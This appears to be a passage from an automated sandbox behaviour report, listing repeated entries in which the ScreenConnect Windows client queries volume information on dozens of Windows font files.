                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
